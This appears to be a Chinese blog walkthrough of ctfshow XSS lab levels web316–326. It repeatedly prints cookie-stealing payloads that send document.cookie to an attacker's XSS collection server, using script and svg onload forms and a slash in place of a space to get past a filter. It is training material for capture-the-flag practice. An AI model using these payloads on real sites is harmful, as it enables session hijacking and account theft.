别怕宝贝ctfshow--xss web316-326一命速通(一payload速通)

前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-CSDN博客

本文整理ctfshow中的xss部分靶场通关攻略

 

web316

打开靶场一个对话框

 经测试有xss漏洞,而且没啥过滤。

考虑xss盗取cookie的操作。

建议在服务器上搭建蓝莲花xss平台

payload:

<script>window.location.href='http://服务器蓝莲花地址/index.php?c='+document.cookie</scrip>

然后靶场后台就会有机器人访问,我们就能收到cookie,而flag就在cookie中。

需要刷新平台页面才能看到收到的消息。

 拿去提交完美~

web317

打开页面还是一模一样

测试这个输入框发现,这个输入框是不能输入script的。

那么我们就无法使用<script>标签了。

这里就利用其他的标签来解决即可。

这里使用<img>标签失败,可以触发但是拿不到cookie,因为是机器人操作可能有误差img无法获取。

所以

payload:

<svg οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>

然后就获取cookie里的flag了。

web318

打开界面

好家伙依旧是一个界面

然后。。。不知道这题咋样,反正上一题的那个payload没问题直接出结果。

web319

打开题目依旧是相同的页面

嘶也没咋测试还是上一个payload给处理了。。。

web320

打开跟上面界面一模一样

这关有说法上关那个payload就无法执行了。

先分析一下他都禁用了些什么。

对上面那个payload一顿测试,发现他没有过滤其他的词,仅仅过滤了空格。

那么我们的思路就变成为

使用无空格的标签

使用符号代替空格

在前端可以使用/来代替空格所以只需要略微改一下payload即可。

payload:

<svg/οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>

 成功获取cookie以及flag

web321

打开界面

还是老样。

然后上一个payload放进去看看。

<svg/οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>

 行又给秒了。

下一题。

web322

打开页面还是一模一样懒得截图了。

还是一样的操作,上上把的payload放上瞅一眼。

<svg/οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>

啧,唉真没挑战性,丫的又给秒了。。。。

下一题下一题

web323

界面还是如出一辙

测测上上上上次的payload

<svg/οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>

行了,又给秒了。

一招鲜吃遍天了。

(所以他到底过滤了啥。。。)

web324

打开不看也是一模一样

依旧是相同的payload来一波

<svg/οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>

依然给他秒了。。。。

web325

一样的payload一样的通关。

不想多吐槽了。

web326

一样秒

不吐槽

嗯很好,

原来开局用一个payload就能打通11关,嗯不错不错。。。。

我靠我的钱。

猜你喜欢

转载自blog.csdn.net/2302_79590880/article/details/143268795